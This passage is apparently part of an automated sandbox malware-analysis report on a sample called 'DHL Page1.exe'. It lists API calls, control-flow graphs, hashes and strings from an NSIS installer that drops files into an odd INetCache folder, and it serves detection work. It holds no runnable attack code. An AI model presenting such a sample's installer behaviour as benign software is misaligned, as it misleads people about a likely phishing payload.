                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CreateInstance
                                              • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage
                                              • API String ID: 542301482-2332303660
                                              • Opcode ID: 7ed6d7f179b345aae6b4327b02c64d324b96f8d885cdf54a11ec98757db65b93
                                              • Instruction ID: 5958ae04ff9ddd9b90f956fc3eb81f74ce24abb364fc99247a43ffb266dbad8b
                                              • Opcode Fuzzy Hash: 7ed6d7f179b345aae6b4327b02c64d324b96f8d885cdf54a11ec98757db65b93
                                              • Instruction Fuzzy Hash: CC414C71A00215AFCB00EFE4CD88A9D7BB5FF48358B20457AF505EB2D1DBB99982CB44
                                              APIs
                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Window$EnableShow
                                              • String ID:
                                              • API String ID: 1136574915-0
                                              • Opcode ID: a0d33996fa0be51fbf4c124d813c9dd807b9501485eba97d8546454eb0cd087f
                                              • Instruction ID: 62fb22e7ab1684179ceac61b9f843ffea96df1620cda5c9d8d0b31a7b0d02902
                                              • Opcode Fuzzy Hash: a0d33996fa0be51fbf4c124d813c9dd807b9501485eba97d8546454eb0cd087f
                                              • Instruction Fuzzy Hash: F6E0D832A082048FD714DBF4AE844AE73B0EB40328721453FE402F20D0CBF848409F6C
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,004302D8,0042FA90,00405D39,0042FA90,0042FA90,00000000,0042FA90,0042FA90, 4Ou.Ou,?,754F2EE0,00405A45,?,754F3420,754F2EE0), ref: 00406582
                                              • FindClose.KERNEL32(00000000), ref: 0040658E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: 9bd2f6d74ac247820c12bebba16c1e001984a9df0bf48ad471536ea90c0b1b10
                                              • Instruction ID: a703cb75f634f3ec2f8c408dc1cec4c4b09ca059f915735dd03d2a96a2a1da7c
                                              • Opcode Fuzzy Hash: 9bd2f6d74ac247820c12bebba16c1e001984a9df0bf48ad471536ea90c0b1b10
                                              • Instruction Fuzzy Hash: 2AD0C931554120ABC2401A686D0C88B6B589F1A3317218F36F46AF12E4C6348C2286A8
                                              APIs
                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040288D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              • API String ID: 1974802433-0
                                              • Opcode ID: 22f707ac0aa1d49a4811a4d856013a69053f4eeaacfc01aa520fbec7f3017ab5
                                              • Instruction ID: 901597bed985556817bf4c53fc3ba8f4a1014b349e76ad9d86058ed67dbacc8e
                                              • Opcode Fuzzy Hash: 22f707ac0aa1d49a4811a4d856013a69053f4eeaacfc01aa520fbec7f3017ab5
                                              • Instruction Fuzzy Hash: B4F0A771A04114EBDB00EBE4D9499EDB378EF04314F2185BBE112F31D0DBB88981DB29

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 184 403e20-403e32 185 403f73-403f82 184->185 186 403e38-403e3e 184->186 188 403fd1-403fe6 185->188 189 403f84-403fcc GetDlgItem * 2 call 4042f8 SetClassLongW call 40140b 185->189 186->185 187 403e44-403e4d 186->187 192 403e62-403e65 187->192 193 403e4f-403e5c SetWindowPos 187->193 190 404026-40402b call 404344 188->190 191 403fe8-403feb 188->191 189->188 203 404030-40404b 190->203 195 403fed-403ff8 call 401389 191->195 196 40401e-404020 191->196 198 403e67-403e79 ShowWindow 192->198 199 403e7f-403e85 192->199 193->192 195->196 217 403ffa-404019 SendMessageW 195->217 196->190 202 4042c5 196->202 198->199 204 403ea1-403ea4 199->204 205 403e87-403e9c DestroyWindow 199->205 214 4042c7-4042ce 202->214 212 404054-40405a 203->212 213 40404d-40404f call 40140b 203->213 209 403ea6-403eb2 SetWindowLongW 204->209 210 403eb7-403ebd 204->210 207 4042a2-4042a8 205->207 207->202 218 4042aa-4042b0 207->218 209->214 215 403f60-403f6e call 40435f 210->215 216 403ec3-403ed4 GetDlgItem 210->216 220 404060-40406b 212->220 221 404283-40429c DestroyWindow EndDialog 212->221 213->212 215->214 222 403ef3-403ef6 216->222 223 403ed6-403eed SendMessageW IsWindowEnabled 216->223 217->214 218->202 225 4042b2-4042bb ShowWindow 218->225 220->221 226 404071-4040be call 406256 call 4042f8 * 3 GetDlgItem 220->226 221->207 228 403ef8-403ef9 222->228 229 403efb-403efe 222->229 223->202 223->222 225->202 254 4040c0-4040c5 226->254 255 4040c8-404104 ShowWindow KiUserCallbackDispatcher call 40431a EnableWindow 226->255 232 403f29-403f2e call 4042d1 228->232 233 403f00-403f06 229->233 234 403f0c-403f11 229->234 232->215 237 403f47-403f5a SendMessageW 233->237 238 403f08-403f0a 233->238 234->237 239 403f13-403f19 234->239 237->215 238->232 242 403f30-403f39 call 40140b 239->242 243 403f1b-403f21 call 40140b 239->243 242->215 251 403f3b-403f45 242->251 252 403f27 243->252 251->252 252->232 254->255 258 404106-404107 255->258 259 404109 255->259 260 40410b-404139 GetSystemMenu EnableMenuItem SendMessageW 258->260 259->260 261 40413b-40414c SendMessageW 260->261 262 40414e 260->262 263 404154-404192 call 40432d call 406234 lstrlenW call 406256 SetWindowTextW call 401389 261->263 262->263 263->203 272 404198-40419a 263->272 272->203 273 4041a0-4041a4 272->273 274 4041c3-4041d7 DestroyWindow 273->274 275 4041a6-4041ac 273->275 274->207 276 4041dd-40420a CreateDialogParamW 274->276 275->202 277 4041b2-4041b8 275->277 276->207 278 404210-404267 call 4042f8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 276->278 277->203 279 4041be 277->279 278->202 284 404269-40427c ShowWindow call 404344 278->284 279->202 286 404281 284->286 286->207
                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E5C
                                              • ShowWindow.USER32(?), ref: 00403E79
                                              • DestroyWindow.USER32 ref: 00403E8D
                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EA9
                                              • GetDlgItem.USER32(?,?), ref: 00403ECA
                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403EDE
                                              • IsWindowEnabled.USER32(00000000), ref: 00403EE5
                                              • GetDlgItem.USER32(?,?), ref: 00403F93
                                              • GetDlgItem.USER32(?,00000002), ref: 00403F9D
                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403FB7
                                              • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404008
                                              • GetDlgItem.USER32(?,00000003), ref: 004040AE
                                              • ShowWindow.USER32(00000000,?), ref: 004040CF
                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040E1
                                              • EnableWindow.USER32(?,?), ref: 004040FC
                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404112
                                              • EnableMenuItem.USER32(00000000), ref: 00404119
                                              • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404131
                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404144
                                              • lstrlenW.KERNEL32(0042D288,?,0042D288,00433F20), ref: 0040416D
                                              • SetWindowTextW.USER32(?,0042D288), ref: 00404181
                                              • ShowWindow.USER32(?,0000000A), ref: 004042B5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                              • String ID:
                                              • API String ID: 3282139019-0
                                              • Opcode ID: dbea649e9c82ebbcea8c96967e97527dc105f753dd70e098ace6a910ed38952d
                                              • Instruction ID: 5d4a2332395b3617a468ab545525e3c53a606f051c31be556a205d5f1676e1a4
                                              • Opcode Fuzzy Hash: dbea649e9c82ebbcea8c96967e97527dc105f753dd70e098ace6a910ed38952d
                                              • Instruction Fuzzy Hash: 67C1D1B1A00205FFCB21AF61EE45E2B3B78EB84346B00057EF641B11F0CB7998529B2D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 287 403a7d-403a95 call 40660e 290 403a97-403aa7 call 40617b 287->290 291 403aa9-403ae0 call 406101 287->291 299 403b03-403b2c call 403d53 call 405cf0 290->299 295 403ae2-403af3 call 406101 291->295 296 403af8-403afe lstrcatW 291->296 295->296 296->299 305 403b32-403b37 299->305 306 403bbe-403bc6 call 405cf0 299->306 305->306 307 403b3d-403b65 call 406101 305->307 312 403bd4-403bf9 LoadImageW 306->312 313 403bc8-403bcf call 406256 306->313 307->306 317 403b67-403b6b 307->317 315 403c7a-403c82 call 40140b 312->315 316 403bfb-403c2b RegisterClassW 312->316 313->312 330 403c84-403c87 315->330 331 403c8c-403c97 call 403d53 315->331 318 403c31-403c75 SystemParametersInfoW CreateWindowExW 316->318 319 403d49 316->319 321 403b7d-403b89 lstrlenW 317->321 322 403b6d-403b7a call 405c15 317->322 318->315 324 403d4b-403d52 319->324 325 403bb1-403bb9 call 405be8 call 406234 321->325 326 403b8b-403b99 lstrcmpiW 321->326 322->321 325->306 326->325 329 403b9b-403ba5 GetFileAttributesW 326->329 333 403ba7-403ba9 329->333 334 403bab-403bac call 405c34 329->334 330->324 340 403d20-403d21 call 405466 331->340 341 403c9d-403cb7 ShowWindow call 40659e 331->341 333->325 333->334 334->325 344 403d26-403d28 340->344 348 403cc3-403cd5 GetClassInfoW 341->348 349 403cb9-403cbe call 40659e 341->349 346 403d42-403d44 call 40140b 344->346 347 403d2a-403d30 344->347 346->319 347->330 352 403d36-403d3d call 40140b 347->352 350 403cd7-403ce7 GetClassInfoW RegisterClassW 348->350 351 403ced-403d10 DialogBoxParamW call 40140b 348->351 349->348 350->351 357 403d15-403d1e call 4039cd 351->357 352->330 357->324
                                              APIs
                                                • Part of subcall function 0040660E: GetModuleHandleA.KERNEL32(?,00000020,?,004034D5,00000009), ref: 00406620
                                                • Part of subcall function 0040660E: GetProcAddress.KERNEL32(00000000,?), ref: 0040663B
                                              • lstrcatW.KERNEL32(1033,0042D288,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D288,00000000,00000002,754F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Page1.exe",00000000), ref: 00403AFE
                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage,1033,0042D288,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D288,00000000,00000002,754F3420), ref: 00403B7E
                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage,1033,0042D288,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D288,00000000), ref: 00403B91
                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403B9C
                                              • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage), ref: 00403BE5
                                                • Part of subcall function 0040617B: wsprintfW.USER32 ref: 00406188
                                              • RegisterClassW.USER32(00433EC0), ref: 00403C22
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C3A
                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C6F
                                              • ShowWindow.USER32(00000005,00000000), ref: 00403CA5
                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00433EC0), ref: 00403CD1
                                              • GetClassInfoW.USER32(00000000,RichEdit,00433EC0), ref: 00403CDE
                                              • RegisterClassW.USER32(00433EC0), ref: 00403CE7
                                              • DialogBoxParamW.USER32(?,00000000,00403E20,00000000), ref: 00403D06
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: "C:\Users\user\Desktop\DHL Page1.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                              • API String ID: 1975747703-338002893
                                              • Opcode ID: a561812ab1fe1cbf548fa405dc37b3d045f86977ed6f2db7d55feea5111cc6ed
                                              • Instruction ID: bf0328bd4fded2bfb524b3e6ced6939b2aeeb15d4dd665303d08d6fe64e2be02
                                              • Opcode Fuzzy Hash: a561812ab1fe1cbf548fa405dc37b3d045f86977ed6f2db7d55feea5111cc6ed
                                              • Instruction Fuzzy Hash: D161A8311402006FE720AF66AD46F6B3A7CEB84B4AF40057FF941B61E2DB7D9941CA2D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 361 402ed5-402f23 GetTickCount GetModuleFileNameW call 405e09 364 402f25-402f2a 361->364 365 402f2f-402f5d call 406234 call 405c34 call 406234 GetFileSize 361->365 366 403196-40319a 364->366 373 402f63-402f7a 365->373 374 40304d-40305b call 402e33 365->374 375 402f7c 373->375 376 402f7e-402f8b call 40340e 373->376 380 403150-403155 374->380 381 403061-403064 374->381 375->376 385 402f91-402f97 376->385 386 40310c-403114 call 402e33 376->386 380->366 383 403090-403100 GlobalAlloc call 405e38 CreateFileW 381->383 384 403066-40307e call 403424 call 40340e 381->384 402 403102-403107 383->402 403 403116-403146 call 403424 call 40319d 383->403 384->380 411 403084-40308a 384->411 389 403017-40301b 385->389 390 402f99-402fb1 call 405dc4 385->390 386->380 393 403024-40302a 389->393 394 40301d-403023 call 402e33 389->394 390->393 409 402fb3-402fba 390->409 400 40302c-40303a call 4066bf 393->400 401 40303d-403047 393->401 394->393 400->401 401->373 401->374 402->366 416 40314b-40314e 403->416 409->393 413 402fbc-402fc3 409->413 411->380 411->383 413->393 415 402fc5-402fcc 413->415 415->393 417 402fce-402fd5 415->417 416->380 419 403157-403168 416->419 417->393 418 402fd7-402ff7 417->418 418->380 420 402ffd-403001 418->420 421 403170-403173 419->421 422 40316a 419->422 423 403003-403007 420->423 424 403009-403011 420->424 425 403175-40317a 421->425 422->421 423->374 423->424 424->393 426 403013-403015 424->426 425->425 427 40317c-403194 call 405dc4 425->427 426->393 427->366
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00402EE9
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL Page1.exe,00000400), ref: 00402F05
                                                • Part of subcall function 00405E09: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\DHL Page1.exe,80000000,00000003), ref: 00405E0D
                                                • Part of subcall function 00405E09: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405E2F
                                              • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL Page1.exe,C:\Users\user\Desktop\DHL Page1.exe,80000000,00000003), ref: 00402F4E
                                              • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403095
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                              • String ID: @$"C:\Users\user\Desktop\DHL Page1.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL Page1.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                              • API String ID: 2803837635-309988298
                                              • Opcode ID: c2fb4f21c120d56b51879791914385b9b913d8ca1c5293dc7937f3d1c81676d6
                                              • Instruction ID: c540003cd6e5ba405c0808e63ef80da0eb25dd1bee470730ffd1ed20f91e81f0
                                              • Opcode Fuzzy Hash: c2fb4f21c120d56b51879791914385b9b913d8ca1c5293dc7937f3d1c81676d6
                                              • Instruction Fuzzy Hash: C171C371A01204ABDB20EF65DD85A9E7FB8EB08319F20417BF504B72D1D7789A40CB5C

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 756 40176f-401794 call 402c53 call 405c5f 761 401796-40179c call 406234 756->761 762 40179e-4017b0 call 406234 call 405be8 lstrcatW 756->762 768 4017b5-4017b6 call 4064c8 761->768 762->768 771 4017bb-4017bf 768->771 772 4017c1-4017cb call 406577 771->772 773 4017f2-4017f5 771->773 781 4017dd-4017ef 772->781 782 4017cd-4017db CompareFileTime 772->782 775 4017f7-4017f8 call 405de4 773->775 776 4017fd-401819 call 405e09 773->776 775->776 783 40181b-40181e 776->783 784 40188d-4018b6 call 405393 call 40319d 776->784 781->773 782->781 785 401820-40185e call 406234 * 2 call 406256 call 406234 call 405979 783->785 786 40186f-401879 call 405393 783->786 798 4018b8-4018bc 784->798 799 4018be-4018ca SetFileTime 784->799 785->771 819 401864-401865 785->819 796 401882-401888 786->796 800 402ae4 796->800 798->799 802 4018d0-4018db CloseHandle 798->802 799->802 804 402ae6-402aea 800->804 805 4018e1-4018e4 802->805 806 402adb-402ade 802->806 808 4018e6-4018f7 call 406256 lstrcatW 805->808 809 4018f9-4018fc call 406256 805->809 806->800 814 401901-4022fc call 405979 808->814 809->814 814->804 819->796 821 401867-401868 819->821 821->786
                                              APIs
                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage,?,?,00000031), ref: 004017B0
                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage,?,?,00000031), ref: 004017D5
                                                • Part of subcall function 00406234: lstrcpynW.KERNEL32(?,?,00000400,00403519,00433F20,NSIS Error), ref: 00406241
                                                • Part of subcall function 00405393: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053CB
                                                • Part of subcall function 00405393: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053DB
                                                • Part of subcall function 00405393: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00402EAD,00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000), ref: 004053EE
                                                • Part of subcall function 00405393: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll), ref: 00405400
                                                • Part of subcall function 00405393: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405426
                                                • Part of subcall function 00405393: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405440
                                                • Part of subcall function 00405393: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040544E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
